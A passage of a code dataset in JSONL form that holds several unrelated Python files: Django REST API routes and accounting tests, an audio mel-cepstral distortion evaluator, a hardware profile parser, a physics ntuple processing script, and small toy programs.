data2[i],Qt.EditRole)","sub_path":"app/utils/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":28127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"619481524","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.contrib.auth.models import User\nfrom rest_framework import routers, serializers, viewsets\n\nfrom data.models import DataSet, Data, Candle\n\nimport data.views\n\nclass DataSetSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = DataSet\n fields = (\n 'url',\n 'name',\n 'ticker',\n 'sector',\n 'quandl_ticker',\n 'qtrade_ticker'\n )\n\nclass DataSetView(viewsets.ModelViewSet):\n queryset = DataSet.objects.all()\n serializer_class = DataSetSerializer\n\n\n\nclass DataSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Data\n fields = (\n 'data_set',\n 'value',\n 'date'\n )\n\nclass DataView(viewsets.ModelViewSet):\n queryset = Data.objects.all()\n serializer_class = DataSerializer\n\n\n\nclass CandleSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Candle\n fields = (\n 'data_set',\n 'volume',\n 'vwap',\n 'high',\n 'low',\n 'open',\n 'close',\n 'start',\n 'end'\n )\n\nclass CandleView(viewsets.ModelViewSet):\n queryset = Candle.objects.all()\n serializer_class = CandleSerializer\n\n\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'datasets', DataSetView)\nrouter.register(r'data', DataView)\nrouter.register(r'candle', CandleView)\n\nurlpatterns = [\n url(r'^api', include(router.urls)),\n url(r'^$', data.views.homepage, name='homepage'),\n url(r'^admin/', admin.site.urls)\n]\n","sub_path":"backtest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"624917332","text":"from datetime import datetime\n\nfrom django.test import TestCase\nfrom django.core.exceptions import ValidationError\n\nfrom .models import Account, Record, BalanceVariation\n\n\ndef populate_db(object_):\n # Accounts\n object_.cash, _ = Account.objects.get_or_create(\n name='Cash', estate=Account.ASSET)\n object_.asset, _ = Account.objects.get_or_create(\n name='Asset', estate=Account.ASSET)\n object_.debts, _ = Account.objects.get_or_create(\n name='Debts', estate=Account.LIABILITY)\n object_.clients, _ = Account.objects.get_or_create(\n name='Clients', estate=Account.ASSET)\n\n # Record\n object_.record, _ = Record.objects.get_or_create(date=datetime.today())\n\n # Balance variation\n object_.cash_decrease, _ = BalanceVariation.objects.get_or_create(\n amount=-100, account=object_.cash, record=object_.record)\n object_.asset_increase = BalanceVariation.objects.get_or_create(\n amount=100, account=object_.asset, record=object_.record)\n\n\nclass TestAccount(TestCase):\n def setUp(self):\n populate_db(self)\n\n def test_account_create(self):\n account = Account(name='Cash', estate=Account.ASSET)\n account.save()\n self.assertEqual(account.name, 'Cash')\n\n def test_account_create_parent(self):\n clients_account = Account(name='Clients', estate=Account.LIABILITY)\n clients_account.save()\n some_client_account = Account(\n name='Some Client Corp.', estate=Account.LIABILITY,\n parent=clients_account)\n some_client_account.save()\n self.assertEqual(some_client_account.parent.name, 'Clients')\n\n def test_account_balance(self):\n cash_increase = BalanceVariation(\n amount=250, account=self.cash, record=self.record)\n cash_increase.save()\n self.assertEqual(self.cash.balance, 150)\n\n\nclass TestRecord(TestCase):\n def setUp(self):\n populate_db(self)\n\n def test_record_create(self):\n self.assertEqual(\n sum(var.amount for var in self.record.variations.all()), 0)\n\n def test_record_clean_invalid_values(self):\n exception_raised = False\n try:\n self.record.clean()\n except ValidationError:\n exception_raised = True\n\n self.assertFalse(exception_raised)\n\n def test_record_clean_valid_values(self):\n record = Record(date=datetime.today())\n record.save()\n\n # Balance variations\n cash_decrease = BalanceVariation(\n amount=100, account=self.cash, record=record)\n cash_decrease.save()\n clients_increase = BalanceVariation(\n amount=-100, account=self.clients, record=record)\n clients_increase.save()\n asset_increase = BalanceVariation(\n amount=100, account=self.asset, record=record)\n asset_increase.save()\n\n self.assertRaises(ValidationError, record.clean)\n\n\nclass TestBalanceVariation(TestCase):\n def setUp(self):\n populate_db(self)\n\n def test_type_credit1(self):\n self.assertEqual(self.cash_decrease.type_, BalanceVariation.CREDIT)\n\n def test_type_credit2(self):\n debts_increase = BalanceVariation(\n amount=100, account=self.debts, record=self.record)\n debts_increase.save()\n self.assertEqual(debts_increase.type_, BalanceVariation.CREDIT)\n\n def test_type_debit1(self):\n cash_increase = BalanceVariation(\n amount=100, account=self.cash, record=self.record)\n cash_increase.save()\n self.assertEqual(cash_increase.type_, BalanceVariation.DEBIT)\n\n def test_type_debit2(self):\n debts_decrease = BalanceVariation(\n amount=-100, account=self.debts, record=self.record)\n debts_decrease.save()\n self.assertEqual(debts_decrease.type_, BalanceVariation.DEBIT)\n","sub_path":"accounting/records/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"392346667","text":"from glob import glob\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport numpy\nimport argparse\n\nimport pysptk\nimport pyworld\n\nfrom os.path import join, exists\nimport os\n\n# from become_yukarin.config import create_from_json as create_config\nfrom mcepdtw import MelCepstrumAligner, DTWAligner\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--target_feature_directory', '-i1', type=str)\nparser.add_argument('--converted_mcep_directory', '-i2', type=str)\nparser.add_argument('--out_dir', '-o', type=str)\nparser.add_argument('--order', type=int, default=39)\narguments = parser.parse_args()\n\nprint(arguments.target_feature_directory)\nprint(arguments.converted_mcep_directory)\nif not exists(join(arguments.out_dir, \"evaluation\")):\n os.makedirs(join(arguments.out_dir, \"evaluation\"))\n\npaths1 = list(sorted(glob(arguments.target_feature_directory + '/*')))\npaths2 = list(sorted(glob(arguments.converted_mcep_directory + '/*')))\n\nassert len(paths1) == len(paths2)\nnum_files = len(paths1)\n\ndef cdist(c1, c2, otype=0, frame=False):\n \"\"\"Calculation of cepstral distance\n Parameters\n ----------\n c1 : array\n Minimum-phase cepstrum\n c2 : array\n Minimum-phase cepstrum\n otype : int\n Output data type\n (0) [db]\n (1) squared error\n (2) root squared error\n Default is 0.\n frame : bool\n If True, returns frame-wise distance, otherwise returns mean distance.\n Default is False.\n Returns\n -------\n distance\n \"\"\"\n if not otype in [0, 1, 2]:\n raise ValueError(\"unsupported otype: %d, must be in 0:2\" % otype)\n assert c1.shape[0] == c2.shape[0]\n T = c1.shape[0]\n\n s = ((c1[:, 1:] - c2[:, 1:])**2).sum(-1)\n if otype == 0:\n s = numpy.sqrt(2 * s) * 10 / numpy.log(10)\n elif otype == 2:\n s = numpy.sqrt(s)\n if frame:\n return s\n else:\n return s.mean()\n\n\ndist = 0\ntarget_GV = [0]*(arguments.order+1)\nconverted_GV = [0]*(arguments.order+1)\n\n# cv = [0]*40\n# cv1 = 0\n# cv2 = 0\n\nfor num in range(0, num_files):\n tgt_mcep = numpy.fromfile(paths1[num], dtype=numpy.float32, sep=\"\").reshape(-1, (arguments.order+1))\n converted_mcep = numpy.fromfile(paths2[num], dtype=numpy.float32, sep=\"\").reshape(-1, (arguments.order+1))\n \n # GV: Global Variance\n for dim in range(0, (arguments.order+1)):\n target_GV[dim] += numpy.var(tgt_mcep, axis=0)[dim]\n converted_GV[dim] += numpy.var(converted_mcep, axis=0)[dim]\n \n # CV: Coefficient of variation\n # for dim in range(0,40):\n # cv[dim] += numpy.abs(numpy.std(mc3[:,dim])/numpy.mean(mc3[:,dim]))\n \n # cv1 += numpy.std(mc2[:,8])/numpy.mean(mc2[:,8])\n # cv2 += numpy.std(mc2[:,39])/numpy.mean(mc2[:,39])\n \n aligner = MelCepstrumAligner(tgt_mcep, converted_mcep)\n tgt_mcep, converted_mcep = aligner.align(tgt_mcep, converted_mcep)\n # print(tgt_mcep.shape)\n # print(converted_mcep.shape)\n mcd = cdist(tgt_mcep, converted_mcep)\n dist += mcd\n print(mcd)\n # drawMcep(mc1,num)\n\n\nwith open(join(arguments.out_dir, \"evaluation\", \"MCD.txt\"), mode=\"w\") as f:\n f.write(str(dist/num_files) + \"\\n\")\n\ntarget_GV = numpy.array(target_GV, dtype=numpy.float32) / num_files\nconverted_GV = numpy.array(converted_GV, dtype=numpy.float32) / num_files\ntarget_GV.tofile(join(arguments.out_dir, \"evaluation\", \"taget.gv\"))\nconverted_GV.tofile(join(arguments.out_dir, \"evaluation\", \"converted.gv\"))\n\nplt.figure(figsize=(16,6))\nplt.plot(target_GV, \"--\", linewidth=2, label=\"Target: global variances\")\nplt.plot(converted_GV, linewidth=2, label=\"baseline: global variances\")\nplt.legend(prop={\"size\": 18})\nplt.yscale(\"log\")\nplt.xlim(0, arguments.order)\nplt.xlabel(\"Dimention\", fontsize=16)\nplt.ylabel(\"Global Varianvce\", fontsize=16)\nplt.savefig(join(arguments.out_dir, \"evaluation\", \"GV.svg\"))\n\n\n# print(\"CV\")\n# for DIM in range(0,40):\n# print(cv[DIM]/50)\n# print(cv1/50)\n# print(cv2/50)\n","sub_path":"01_pytorch_ver/tool/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"20874452","text":"import json\nimport copy\nfrom collections import OrderedDict\n\nimport ee.common.utility as utility\nfrom ee.common import logger\nfrom profile import Profile\nfrom ee.profile.xobj import XObject\n\n#decode unicode to utf-8\ndef _convert(input_value):\n if isinstance(input_value, dict):\n return {_convert(key): _convert(value) for key, value in input_value.iteritems()}\n elif isinstance(input_value, list):\n return [_convert(element) for element in input_value]\n elif isinstance(input_value, unicode):\n return input_value.encode('utf-8')\n else:\n return input_value\n\ndef _addr2hex(addr):\n if isinstance(addr, dict):\n for key, value in addr.iteritems():\n if key is 'addr':\n addr[key] = hex(addr[key])\n _addr2hex(value)\n\ndef _str_dict(input_dict):\n new_dict = copy.deepcopy(input_dict)\n _addr2hex(new_dict)\n return str(new_dict)\n\nclass ProfileParser(object):\n def __init__(self):\n self._base_board_name = None\n\n def read_profile(self,hardware_function_profile):\n logger.boot(\"start parser, profile path:%s\"%(hardware_function_profile))\n try:\n profile = utility.load_json_file(hardware_function_profile,object_hook=_convert)\n except Exception as e:\n logger.boot(\"error: read json profile fail:%s\"%(repr(e)))\n return None\n\n self._base_board_name = profile['base_board']['id']\n Profile.set_base_board_name(self._base_board_name)\n\n for bus in profile['buses']:\n bus_name = bus['id']\n try:\n self._parse_buses(bus)\n except Exception as e:\n logger.boot('error: parse the %s bus fail: %s'%(bus_name, repr(e)))\n else:\n logger.boot('parse the %s bus:%s'%(bus_name, _str_dict(Profile.get_bus_by_name(bus_name))))\n\n if 'netconfig' in profile.keys():\n initconfig=Profile.get_initconfig()\n initconfig['netconfig']=profile['netconfig']\n\n if 'digital_io' in profile.keys():\n for io in profile['digital_io']:\n io_id = io['id']\n try:\n self._parse_digital_io(io)\n except Exception as e:\n logger.boot(\"error: parse the %s digital io fail:%s\"%(io_id, repr(e)))\n else:\n logger.boot(\"parse the %s digital io:%s\"%(io_id,Profile.get_ioes()[io_id]))\n\n if \"chips\" in profile:\n for chip in profile['chips']:\n chipname = chip['id']\n try:\n self._parse_chips(chip)\n except Exception as e:\n logger.boot('error: parser the %s chip fail: %s'%(chipname, repr(e)))\n else:\n try:\n str_chip_profile = _str_dict(Profile.get_chip_by_name(chipname))\n except KeyError:\n str_chip_profile = _str_dict(Profile.get_eeprom_by_name(chipname))\n logger.boot('parser the %s chip:%s'%(chipname, str_chip_profile))\n\n if \"boards\" in profile:\n for board in profile['boards']:\n board_name = board['id']\n if 'eeprom' in board.keys():\n eeproms = board['eeprom']\n if isinstance(eeproms,dict):\n eeproms = [eeproms]\n\n if isinstance(eeproms,list) is False:\n logger.boot(\"error: can not parse the board eeprom,invalid format\")\n else:\n for eeprom in eeproms:\n try:\n eeprom_id = eeprom[\"id\"]\n self._parse_eeprom(board_name, eeprom)\n except Exception as e:\n logger.boot('error: parser the %s board eeprom fail: %s'%(board_name,repr(e)))\n else:\n logger.boot('parser the %s board eeprom:%s'%(board_name, _str_dict(Profile.get_eeprom_by_name(eeprom_id))))\n\n try:\n self._parse_boards(board)\n except Exception as e:\n logger.boot('error: parse the %s board fail: %s'%(board_name, repr(e)))\n else:\n logger.boot('parser board success, %s:%s'%(board_name,_str_dict(Profile.get_board_by_name(board_name))))\n\n logger.boot('parse done')\n return True\n\n def _parse_buses(self, bus):\n bus_name = bus['id']\n bus_type = bus['bus']\n \n buses = Profile.get_buses()\n buses[bus_name] = dict()\n\n for key in bus.keys():\n if key != 'id':\n buses[bus_name][key] = bus[key]\n\n if 'path' in bus.keys():\n buses[bus_name]['path'] = utility.get_dev_path() + '/' + bus['path']\n\n if bus_type == 'uart':\n initconfig = Profile.get_initconfig()\n initconfig['uart'] = initconfig.setdefault('uart', OrderedDict())\n initconfig['uart'][bus_name] = dict(baudrate=bus['baudrate'],databits=bus['databits'],stopbits=bus['stopbits'],parity=bus['parity'])\n if 'timestamp' in bus.keys():\n initconfig['uart'][bus_name]['timestamp'] = bus['timestamp']\n\n def _parse_boards(self, board):\n initconfig = Profile.get_initconfig()\n initconfig['boards'] = initconfig.setdefault('boards', list())\n board_name = board['id']\n partno = board['partno']\n partno_list = partno.replace('-', '_')\n method_name = 'parse_' + partno_list.lower()\n class_name = partno.replace('-', '')\n try:\n XObject.get_classes()[class_name].parse_board_profile(board)\n initconfig['boards'].append(board_name)\n except AttributeError:\n logger.boot('warning: unable to parser the %s partno of the %s board: has no the method %s'\n %(partno,board_name,method_name))\n raise\n\n def _parse_chips(self, module):\n chipname = module['id']\n partno = module['partno']\n method_name = 'parse_' + partno.lower()\n\n try:\n XObject.get_classes()[partno].parse_chip_profile(module, self._base_board_name)\n except AttributeError:\n logger.boot('warning: unable to parser the %s partno of the %s chip: has no the method %s'\n %(partno,chipname,method_name))\n raise\n\n def _parse_eeprom(self, board_name, eeprom):\n chip_id = eeprom['id']\n eeprofile = Profile.get_eeprom()\n eeprofile[chip_id] = dict()\n\n for key, value in eeprom.iteritems():\n eeprofile[chip_id][key] = copy.deepcopy(value)\n\n eeprofile[chip_id]['bus'] = Profile.get_bus_path(eeprom['bus'])\n eeprofile[chip_id]['addr'] = int(eeprom['addr'],16)\n \n def _parse_digital_io(self,profile):\n '''\n {\n \"gpio_id\":{\"type\":\"gpio\",\"path\":\"AXI4_GPIO_0\",\"ipcore\":\"Axi4Gpio\",\"gpio_number\":\"0\"},\n\n }\n '''\n \n ioes = Profile.get_ioes()\n digital_io_id = profile['id']\n ioes[digital_io_id] = dict()\n ioes[digital_io_id] = copy.deepcopy(profile)\n\n ioes[digital_io_id].pop(\"id\")\n\n if 'type' in profile.keys() and profile['type'] == 'gpio':\n initconfig = Profile.get_initconfig()\n initconfig['gpio'] = initconfig.setdefault('gpio', dict())\n gpio_number = int(profile['gpio_number'])\n dir_value = {'input': 1,'output': 0}\n dire = (gpio_number,dir_value[ioes[digital_io_id].pop(\"dir\")])\n initconfig['gpio'][digital_io_id]=dict(dir=dire)\n if 'default' in profile.keys():\n value = (gpio_number,int(ioes[digital_io_id].pop(\"default\")))\n initconfig['gpio'][digital_io_id]['value'] = value\n\n","sub_path":"xavier_vendor/ee/profile/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":7949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"474050582","text":"'''\r\n 0.- personaje\r\n 1.- cajas\r\n 2.- metas\r\n 3.- paredes\r\n 4.- pasillo\r\n 5.- caja/meta\r\n 6.-personaje/meta\r\n'''\r\nmapa=[[3, 3, 3, 3, 3],\r\n [3, 4, 0, 4, 3],\r\n [3, 1, 2, 4, 3], \r\n [3, 3, 3, 3, 3]]\r\n\r\nposition_col= 3\r\nposition_row= 1\r\n\r\ndef printMapa():\r\n for x in range(len(mapa)):\r\n for y in range(len(mapa[x])):\r\n print(mapa[x][y], end= \" \")\r\n print()\r\nprintMapa()\r\nwhile True:\r\n move=input('a_left,d_rigth')\r\n #derecha\r\n if move ==\"d\":\r\n if mapa[position_row][position_col]==0 and mapa[position_row][position_col+1]==4:\r\n mapa [position_row] [position_col]=4\r\n mapa [position_row] [position_col +1]=0\r\n position_col=position_col+1 \r\n printMapa()","sub_path":"socoban5.py","file_name":"socoban5.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"368251546","text":"# plotting the data\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os, os.path\n\n\n\n# counting files in the renamed directory\nids = len(os.listdir('./results/sorted/'))\n\n\nn = 0\nparticipantid = []\n\nwhile n < ids:\n n = n + 1\n m = n + 10\n participantid.append(m)\n\n# creating an index list for the videonames\n\n\nn = 1\nvideonumber = []\n\nwhile n <= 166:\n videonumber.append(n)\n n = n + 1\n\n\n# reading files into a list with index for histogram (sorted by index)\n\nfor f in participantid:\n\n infile = file('./results/sorted/%s.txt' % f, 'r')\n\n rating = []\n\n for line in infile:\n\n list1 = []\n list1 = line.strip().split(',')\n list1.pop(0)\n value = list1[0]\n int(value)\n\n rating.append(value)\n\n numrow = len(participantid)\n num = int(f) - 10\n\n\n plt.figure(1)\n plt.subplot(numrow, 1, num)\n plt.plot(rating, 'bo')\n plt.ylabel('rating')\n plt.xlabel('video id')\n plt.title(f)\n\nplt.show()\n\n\n\n# reading files into a list sorted by rating with index\n","sub_path":"histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"15211542","text":"import argparse\nparser = argparse.ArgumentParser(description=\"\")\nparser.add_argument(\"year\" , help = \"choose among:2016,2017,2018\", default = '2018')\nargs = parser.parse_args()\nyear = args.year\n\nimport os, sys\nimport ROOT, math\nimport numpy as np\nimport pandas, root_numpy\nfrom ROOT import TLorentzVector\nfrom copy import deepcopy as dc\npandas.options.mode.chained_assignment = None # default='warn'\n\nmuonmass_ = 0.1056583745\nkaonmass_ = 0.493677\npionmass_ = 0.139570\nJPsiMass_ = 3.096916\n\nfrom PhysicsTools.HeppyCore.utils.deltar import deltaR\n\nsamples = [\n 'data',\n 'MC_LMNR', \n 'MC_JPSI', \n 'MC_PSI', \n# 'MC_BS', \n# 'MC_BSJPSIPHI', \n# 'MC_BSJPSIKST', \n# 'MC_HBJPSIX', # 2018\n\n ]\n\ntkp_lv = TLorentzVector()\ntkm_lv = TLorentzVector()\nmum_lv = TLorentzVector()\nmup_lv = TLorentzVector()\n\npion_lv = TLorentzVector()\nkaon_lv = TLorentzVector()\n\n\n@np.vectorize\ndef addDR(\n mumEta, mumPhi, \n tkpEta, tkpPhi\n ):\n \n if mumEta == -99:\n return -99 \n\n return deltaR(mumEta, mumPhi, tkpEta, tkpPhi )\n\n@np.vectorize\ndef addPsi2sMass(\n mumPt, mumEta, mumPhi, \n mupPt, mupEta, mupPhi, \n tkmPt, tkmEta, tkmPhi,\n tkpPt, tkpEta, tkpPhi\n ):\n \n if mumPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(mumPt, mumEta, mumPhi, muonmass_)\n mup_lv.SetPtEtaPhiM(mupPt, mupEta, mupPhi, muonmass_)\n tkp_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n tkm_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n\n opt1 = (mum_lv + mup_lv + tkp_lv + tkm_lv).M()\n return opt1\n\n@np.vectorize\ndef addpipiMass(\n tkmPt, tkmEta, tkmPhi, \n tkpPt, tkpEta, tkpPhi\n ):\n \n if tkmPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n tkp_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n\n opt1 = (mum_lv + tkp_lv ).M()\n return opt1\n\n\n@np.vectorize\ndef addpiKMass(\n mumPt, mumEta, mumPhi, \n tkpPt, tkpEta, tkpPhi\n ):\n \n if mumPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(mumPt, mumEta, mumPhi, pionmass_)\n tkp_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n\n opt1 = (mum_lv + tkp_lv ).M()\n return opt1\n\n\n@np.vectorize\ndef addmmpi2(\n mumPt, mumEta, mumPhi, \n mupPt, mupEta, mupPhi, \n tkmPt, tkmEta, tkmPhi,\n tkpPt, tkpEta, tkpPhi,\n tagB0\n ):\n \n if mumPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(mumPt, mumEta, mumPhi, muonmass_)\n mup_lv.SetPtEtaPhiM(mupPt, mupEta, mupPhi, muonmass_)\n if tagB0 == 1:\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n else:\n pion_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n kaon_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, kaonmass_)\n\n opt1 = (mum_lv + mup_lv + pion_lv ).M()\n opt2 = (mum_lv + mup_lv + kaon_lv ).M()\n return opt1, opt2\n\n\n@np.vectorize\ndef addmmpi2Paolo(\n mumuPt, mumuEta, mumuPhi, mumuMass, \n tkmPt, tkmEta, tkmPhi,\n tkpPt, tkpEta, tkpPhi,\n tagB0\n ):\n \n mum_lv.SetPtEtaPhiM(mumuPt, mumuEta, mumuPhi, mumuMass)\n if tagB0 == 1:\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n else:\n pion_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n kaon_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, kaonmass_)\n\n opt1 = (mum_lv + pion_lv ).M()\n opt2 = (mum_lv + kaon_lv ).M()\n return opt1, opt2\n\n\n@np.vectorize\ndef addkstarmass(\n tkmPt, tkmEta, tkmPhi, \n tkpPt, tkpEta, tkpPhi,\n tagB0\n ):\n \n \n if tagB0 == 1:\n kaon_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, kaonmass_)\n pion_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n else:\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n\n opt1 = (kaon_lv + pion_lv ).M()\n return opt1\n\n@np.vectorize\ndef addbwtmass(\n mumuPt, mumuEta, mumuPhi, mumuMass, \n tkmPt, tkmEta, tkmPhi, \n tkpPt, tkpEta, tkpPhi,\n tagB0\n ):\n \n \n mum_lv.SetPtEtaPhiM(mumuPt, mumuEta, mumuPhi, mumuMass)\n if tagB0 == 1:\n kaon_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, kaonmass_)\n pion_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n else:\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n\n opt1 = (mum_lv + kaon_lv + pion_lv ).M()\n return opt1\n\n\n\n\ndef addmmpiKaon (row):\n if row['tagB0'] == 1 :\n return row['bBarMass']\n else: \n return row['bMass']\ndef addkst2 (row):\n if row['tagB0'] == 1 :\n return row['kstBarMass']\n else: \n return row['kstMass']\n\ndef addpi1Pt (row):\n if row['tagB0'] == 1 :\n return row['kstTrkpPt']\n else: \n return row['kstTrkmPt']\ndef addpi2Pt (row):\n if row['tagB0'] == 1 :\n return row['kstTrkmPt']\n else: \n return row['kstTrkpPt']\n\n\n\n@np.vectorize\ndef addmmkkmass(\n mumPt, mumEta, mumPhi, \n mupPt, mupEta, mupPhi, \n tkmPt, tkmEta, tkmPhi,\n tkpPt, tkpEta, tkpPhi ):\n \n if mumPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(mumPt, mumEta, mumPhi, muonmass_)\n mup_lv.SetPtEtaPhiM(mupPt, mupEta, mupPhi, muonmass_)\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, kaonmass_)\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, kaonmass_)\n\n opt1 = (mum_lv + mup_lv + pion_lv + kaon_lv).M()\n return opt1\n\n\n@np.vectorize\ndef addmmpipimass(\n mumPt, mumEta, mumPhi, \n mupPt, mupEta, mupPhi, \n tkmPt, tkmEta, tkmPhi,\n tkpPt, tkpEta, tkpPhi ):\n \n if mumPt == -99:\n return -99 \n \n mum_lv.SetPtEtaPhiM(mumPt, mumEta, mumPhi, muonmass_)\n mup_lv.SetPtEtaPhiM(mupPt, mupEta, mupPhi, muonmass_)\n pion_lv.SetPtEtaPhiM(tkmPt, tkmEta, tkmPhi, pionmass_)\n kaon_lv.SetPtEtaPhiM(tkpPt, tkpEta, tkpPhi, pionmass_)\n\n opt1 = (mum_lv + mup_lv + pion_lv + kaon_lv).M()\n return opt1\n\n\n@np.vectorize\ndef addxcut(wt_mass, wt_kstarmass, kaonPt, pionPt, mmpiMass, mmkMass):\n \n bool1 = ( (5.2791 - wt_mass) - 0.3 ) / (-0.1-0.3)< (((wt_kstarmass-0.896)--0.4) / (0.6--0.4))\n bool2 = kaonPt > pionPt\n bool3 = (wt_kstarmass-0.896)>0\n bool4 = (mmpiMass > 3.2) & (mmpiMass < 3.6)\n bool5 = (mmkMass > 4.7) & (mmkMass < 4.9)\n bool6 = ((mmkMass - 3.8) / (4.8 - 3.8)) > ((mmpiMass-3)/(3.6-3))\n \n xcut = bool1 & bool2 & bool3 & bool4 & bool5 & bool6\n return xcut\n\n\nfor str_file in samples:\n\n input_files = []\n print (str_file)\n\n for i in range(1):\n input_files = []\n input_files.append('../final_ntuples/%s%s_newphi_punzi_removeTkMu_fixBkg_B0Psicut_fixPres.root'%(args.year, str_file )) \n ofile = '../final_ntuples/%s%s_newphi_punzi_removeTkMu_fixBkg_B0Psicut_addxcutvariable.root'%(year, str_file)\n\n print ('loading ds...')\n ds = pandas.DataFrame(\n root_numpy.root2array(\n input_files,\n 'ntuple',\n# stop = 10000\n )\n )\n \n ds['wt_mass']= ds.apply (lambda row: addmmpiKaon(row), axis=1) \n\n ds['wt_kstarmass']= ds.apply (lambda row: addkst2(row), axis=1) \n \n ds['kaonPt'] = ds.apply (lambda row: addpi1Pt(row), axis=1)\n ds['pionPt'] = ds.apply (lambda row: addpi2Pt(row), axis=1)\n \n\n ds['mmpiMass'], ds['mmkMass'] = addmmpi2(\n ds.mumPt, ds.mumEta, ds.mumPhi, \n ds.mupPt, ds.mupEta, ds.mupPhi, \n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n ds.tagB0\n )\n \n ds['mmkkMass']= addmmkkmass(\n ds.mumPt, ds.mumEta, ds.mumPhi, \n ds.mupPt, ds.mupEta, ds.mupPhi, \n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n )\n ds['mmpipiMass']= addmmpipimass(\n ds.mumPt, ds.mumEta, ds.mumPhi, \n ds.mupPt, ds.mupEta, ds.mupPhi, \n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n )\n ds['pipiMass']= addpipiMass(\n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n )\n ds['xcut'] = addxcut(ds.wt_mass, ds.wt_kstarmass, ds.kaonPt, ds.pionPt, ds.mmpiMass, ds.mmkMass )\n ds['xcut'] = ds['xcut'].astype(np.int32) \n ds['muptrkm_pik'] = addpiKMass(\n ds.mupPt, ds.mupEta, ds.mupPhi, \n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n )\n ds['muptrkm_kp'] = addpiKMass(\n ds.kstTrkmPt, ds.kstTrkmEta, ds.kstTrkmPhi,\n ds.mupPt, ds.mupEta, ds.mupPhi, \n )\n ds['mumtrkp_pik'] = addpiKMass(\n ds.mumPt, ds.mumEta, ds.mumPhi, \n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n )\n ds['mumtrkp_kpi'] = addpiKMass(\n ds.kstTrkpPt, ds.kstTrkpEta, ds.kstTrkpPhi,\n ds.mumPt, ds.mumEta, ds.mumPhi, \n )\n \n \n import root_pandas\n ds.to_root(ofile, key='ntuple')#, store_index=False)\n \n","sub_path":"bdt/addVarsData.py","file_name":"addVarsData.py","file_ext":"py","file_size_in_byte":10714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"56810377","text":"a=eval(input(\"enter any number to print reverse\"))\nrev=0\nb=a\nwhile a!=0:\n n=a%10\n a=a//10\n rev=rev*10+n\n\nprint(f\"The reverse of entered number is {rev}\")\n\nif b==rev:\n print('palindrome')\nelse:\n print('not a 